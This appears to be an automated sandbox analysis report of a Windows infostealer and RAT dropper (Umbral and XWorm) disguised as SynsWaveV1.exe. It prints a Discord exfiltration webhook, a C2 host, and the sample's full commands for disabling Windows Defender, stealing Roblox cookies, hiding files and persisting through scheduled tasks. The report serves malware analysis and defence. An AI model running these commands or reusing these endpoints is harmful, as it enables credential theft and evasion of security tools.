Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22-09-2024 12:05
Static task
static1
Behavioral task
behavioral1
Sample
SynsWaveV1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SynsWaveV1.exe
Resource
win10v2004-20240802-en
General
-
Target
SynsWaveV1.exe
-
Size
344KB
-
MD5
252e28b7d06ae4b2bf8c56f10d06a3e7
-
SHA1
627792fbbbb83492c3f0165122d85d421c884f48
-
SHA256
5c5029b744142f662953c4afdbc4ed7b4eb686e42d823acbb86d80c88010b948
-
SHA512
027461b60e2145fb8b2919a9335ee87ecead596e223c7abe9b6ab5d6293ec239f9cbd33f6af895b54c300b8744fa3bbb780d840a0997dac4160d497f9ecd3d24
-
SSDEEP
6144:zMvzH7izNanQwxxqCbnjZfPxxKpJ6uMtk1L3vTrolPTyKaUxPVUWsP9OxX26sqh:zMrH7ipqbqCLFf7KpJ6uMmB3vYLyEPVV
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1287356979475386418/SjsKMoKntf-tJwWJfIOoeVJTxW-pZZsUeBXbJHYWlQ4Unqm9uEyyu-DxEGFodPCSL8F6
Extracted
xworm
expected-schema.gl.at.ply.gg:2980
-
Install_directory
%LocalAppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000c000000012281-5.dat family_umbral behavioral1/memory/1932-9-0x00000000001E0000-0x0000000000220000-memory.dmp family_umbral -
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x00070000000186f8-11.dat family_xworm behavioral1/memory/1996-18-0x0000000000F70000-0x0000000000F8A000-memory.dmp family_xworm behavioral1/memory/1036-96-0x00000000009A0000-0x00000000009BA000-memory.dmp family_xworm behavioral1/memory/1924-98-0x0000000001060000-0x000000000107A000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 980 powershell.exe 1200 powershell.exe 2932 powershell.exe 772 powershell.exe 664 powershell.exe 580 powershell.exe 2256 powershell.exe 2432 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts MISHA_litvin.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk RuntimeBroker.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk RuntimeBroker.exe -
Executes dropped EXE 5 IoCs
pid Process 1932 MISHA_litvin.exe 1996 RuntimeBroker.exe 2524 SynsWave.exe 1036 RuntimeBroker 1924 RuntimeBroker -
Loads dropped DLL 1 IoCs
pid Process 2672 SynsWaveV1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "C:\\Users\\Admin\\AppData\\Local\\RuntimeBroker" RuntimeBroker.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 discord.com 18 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2804 PING.EXE 1668 cmd.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2508 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2804 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2088 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 772 powershell.exe 664 powershell.exe 980 powershell.exe 1200 powershell.exe 1996 RuntimeBroker.exe 1932 MISHA_litvin.exe 2932 powershell.exe 580 powershell.exe 2256 powershell.exe 2056 powershell.exe 2432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1996 RuntimeBroker.exe Token: SeDebugPrivilege 1932 MISHA_litvin.exe Token: SeDebugPrivilege 772 powershell.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 1996 RuntimeBroker.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeIncreaseQuotaPrivilege 2004 wmic.exe Token: SeSecurityPrivilege 2004 wmic.exe Token: SeTakeOwnershipPrivilege 2004 wmic.exe Token: SeLoadDriverPrivilege 2004 wmic.exe Token: SeSystemProfilePrivilege 2004 wmic.exe Token: SeSystemtimePrivilege 2004 wmic.exe Token: SeProfSingleProcessPrivilege 2004 wmic.exe Token: SeIncBasePriorityPrivilege 2004 wmic.exe Token: SeCreatePagefilePrivilege 2004 wmic.exe Token: SeBackupPrivilege 2004 wmic.exe Token: SeRestorePrivilege 2004 wmic.exe Token: SeShutdownPrivilege 2004 wmic.exe Token: SeDebugPrivilege 2004 wmic.exe Token: SeSystemEnvironmentPrivilege 2004 wmic.exe Token: SeRemoteShutdownPrivilege 2004 wmic.exe Token: SeUndockPrivilege 2004 wmic.exe Token: SeManageVolumePrivilege 2004 wmic.exe Token: 33 2004 wmic.exe Token: 34 2004 wmic.exe Token: 35 2004 wmic.exe Token: SeDebugPrivilege 2932 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe Token: SeDebugPrivilege 2056 powershell.exe Token: SeIncreaseQuotaPrivilege 2000 wmic.exe Token: SeSecurityPrivilege 2000 wmic.exe Token: SeTakeOwnershipPrivilege 2000 wmic.exe Token: SeLoadDriverPrivilege 2000 wmic.exe Token: SeSystemProfilePrivilege 2000 wmic.exe Token: SeSystemtimePrivilege 2000 wmic.exe Token: SeProfSingleProcessPrivilege 2000 wmic.exe Token: SeIncBasePriorityPrivilege 2000 wmic.exe Token: SeCreatePagefilePrivilege 2000 wmic.exe Token: SeBackupPrivilege 2000 wmic.exe Token: SeRestorePrivilege 2000 wmic.exe Token: SeShutdownPrivilege 2000 wmic.exe Token: SeDebugPrivilege 2000 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1996 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2672 wrote to memory of 1932 2672 SynsWaveV1.exe 30 PID 2672 wrote to memory of 1932 2672 SynsWaveV1.exe 30 PID 2672 wrote to memory of 1932 2672 SynsWaveV1.exe 30 PID 2672 wrote to memory of 1996 2672 SynsWaveV1.exe 31 PID 2672 wrote to memory of 1996 2672 SynsWaveV1.exe 31 PID 2672 wrote to memory of 1996 2672 SynsWaveV1.exe 31 PID 2672 wrote to memory of 2524 2672 SynsWaveV1.exe 32 PID 2672 wrote to memory of 2524 2672 SynsWaveV1.exe 32 PID 2672 wrote to memory of 2524 2672 SynsWaveV1.exe 32 PID 2524 wrote to memory of 1248 2524 SynsWave.exe 34 PID 2524 wrote to memory of 1248 2524 SynsWave.exe 34 PID 2524 wrote to memory of 1248 2524 SynsWave.exe 34 PID 1996 wrote to memory of 772 1996 RuntimeBroker.exe 37 PID 1996 wrote to memory of 772 1996 RuntimeBroker.exe 37 PID 1996 wrote to memory of 772 1996 RuntimeBroker.exe 37 PID 1996 wrote to memory of 664 1996 RuntimeBroker.exe 39 PID 1996 wrote to memory of 664 1996 RuntimeBroker.exe 39 PID 1996 wrote to memory of 664 1996 RuntimeBroker.exe 39 PID 1996 wrote to memory of 980 1996 RuntimeBroker.exe 41 PID 1996 wrote to memory of 980 1996 RuntimeBroker.exe 41 PID 1996 wrote to memory of 980 1996 RuntimeBroker.exe 41 PID 1996 wrote to memory of 1200 1996 RuntimeBroker.exe 43 PID 1996 wrote to memory of 1200 1996 RuntimeBroker.exe 43 PID 1996 wrote to memory of 1200 1996 RuntimeBroker.exe 43 PID 1996 wrote to memory of 2088 1996 RuntimeBroker.exe 45 PID 1996 wrote to memory of 2088 1996 RuntimeBroker.exe 45 PID 1996 wrote to memory of 2088 1996 RuntimeBroker.exe 45 PID 1932 wrote to memory of 2004 1932 MISHA_litvin.exe 47 PID 1932 wrote to memory of 2004 1932 MISHA_litvin.exe 47 PID 1932 wrote to memory of 2004 1932 MISHA_litvin.exe 47 PID 1932 wrote to memory of 1776 1932 MISHA_litvin.exe 49 PID 1932 wrote to memory of 1776 1932 MISHA_litvin.exe 49 PID 1932 wrote to memory of 1776 1932 MISHA_litvin.exe 49 PID 1932 wrote to memory of 2932 1932 MISHA_litvin.exe 51 PID 1932 wrote to memory of 2932 1932 MISHA_litvin.exe 51 PID 1932 wrote to memory of 2932 1932 MISHA_litvin.exe 51 PID 1932 wrote to memory of 580 1932 MISHA_litvin.exe 53 PID 1932 wrote to memory of 580 1932 MISHA_litvin.exe 53 PID 1932 wrote to memory of 580 1932 MISHA_litvin.exe 53 PID 1932 wrote to memory of 2256 1932 MISHA_litvin.exe 55 PID 1932 wrote to memory of 2256 1932 MISHA_litvin.exe 55 PID 1932 wrote to memory of 2256 1932 MISHA_litvin.exe 55 PID 1932 wrote to memory of 2056 1932 MISHA_litvin.exe 57 PID 1932 wrote to memory of 2056 1932 MISHA_litvin.exe 57 PID 1932 wrote to memory of 2056 1932 MISHA_litvin.exe 57 PID 1932 wrote to memory of 2000 1932 MISHA_litvin.exe 59 PID 1932 wrote to memory of 2000 1932 MISHA_litvin.exe 59 PID 1932 wrote to memory of 2000 1932 MISHA_litvin.exe 59 PID 1932 wrote to memory of 2200 1932 MISHA_litvin.exe 61 PID 1932 wrote to memory of 2200 1932 MISHA_litvin.exe 61 PID 1932 wrote to memory of 2200 1932 MISHA_litvin.exe 61 PID 1932 wrote to memory of 2796 1932 MISHA_litvin.exe 63 PID 1932 wrote to memory of 2796 1932 MISHA_litvin.exe 63 PID 1932 wrote to memory of 2796 1932 MISHA_litvin.exe 63 PID 1932 wrote to memory of 2432 1932 MISHA_litvin.exe 65 PID 1932 wrote to memory of 2432 1932 MISHA_litvin.exe 65 PID 1932 wrote to memory of 2432 1932 MISHA_litvin.exe 65 PID 1932 wrote to memory of 2508 1932 MISHA_litvin.exe 67 PID 1932 wrote to memory of 2508 1932 MISHA_litvin.exe 67 PID 1932 wrote to memory of 2508 1932 MISHA_litvin.exe 67 PID 1932 wrote to memory of 1668 1932 MISHA_litvin.exe 69 PID 1932 wrote to memory of 1668 1932 MISHA_litvin.exe 69 PID 1932 wrote to memory of 1668 1932 MISHA_litvin.exe 69 PID 1668 wrote to memory of 2804 1668 cmd.exe 71 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1776 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\SynsWaveV1.exe"C:\Users\Admin\AppData\Local\Temp\SynsWaveV1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Users\Admin\MISHA_litvin.exe"C:\Users\Admin\MISHA_litvin.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\MISHA_litvin.exe"3⤵
- Views/modifies file attributes
PID:1776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\MISHA_litvin.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2200
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2508
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\MISHA_litvin.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2804
-
-
-
-
C:\Users\Admin\RuntimeBroker.exe"C:\Users\Admin\RuntimeBroker.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Local\RuntimeBroker"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2088
-
-
-
C:\Users\Admin\SynsWave.exe"C:\Users\Admin\SynsWave.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls3⤵PID:1248
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DCF7ED46-D144-4A14-8C61-2C2561794318} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]1⤵PID:2344
-
C:\Users\Admin\AppData\Local\RuntimeBrokerC:\Users\Admin\AppData\Local\RuntimeBroker2⤵
- Executes dropped EXE
PID:1036
-
-
C:\Users\Admin\AppData\Local\RuntimeBrokerC:\Users\Admin\AppData\Local\RuntimeBroker2⤵
- Executes dropped EXE
PID:1924
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGEJ3MQXC1QLRA0FY4CK.temp
Filesize7KB
MD5c0b4a82e331a497aeb821352ceeeeaca
SHA123a86469e5b99acbd9f64f46cce635119e8ba030
SHA25630f461ecffe628be5d02d0a941df4eab96eb961fb67d439bd0f353dab94a66f3
SHA51222a91283f5180e192eb7332740d8aca3bee5cec76ce4c6349ddf78effb68309b23fbb72a48c9a96be51eb3a28c66e9b82c04af41b2fef5fcb787ab7a0113e328
-
Filesize
229KB
MD58bb8292d00e8218192562b888b4d7671
SHA161a03523336bd54964fbb62338027673d0a138cb
SHA256a9f8c9cf4ceadfa6bc56ab230c8dfe8a7018e1123ba01039a4059b1814b757a0
SHA512c19a19dd6b49cc237e751db9d58db56e745f7d00c8d81397928fddef8902b9abec4b9331573be9478d33554c6b77b4f52a055bf2251300736035b5eec24faa1e
-
Filesize
80KB
MD53f818db06e08ab696d499db881ab0fc7
SHA1795e0507484d696cd309ce4db43425ab5cdf10b1
SHA256ebc2b830428b5ee088d63cc2814113c3ce8685b9db026732ec3d7989592db027
SHA5126c8cd0482dcbf3293dd18c8f4effe132f3d133da51c0d53bc791f63df947108d3abf59b5b6ffee2a2f4abbeabf6c3fbddd2339cbcd4fccf6b29515a6a47cc593
-
Filesize
25KB
MD512e7359129744823438f3d6b97192955
SHA189872a5a18abefe25d10efa824281718cf85ae39
SHA256348086f9bd5939a48efcc94702271c1caf92ea11f3b0385367daf9530b51cf3e
SHA512b38516752817d3ac6541d300cc17176c5bf1c38d321fd19c006cb1f5cf9d5ab7a228184ed267636841225e718f71d9cd8aed5e53e36c7ee3548ed6958b9e8563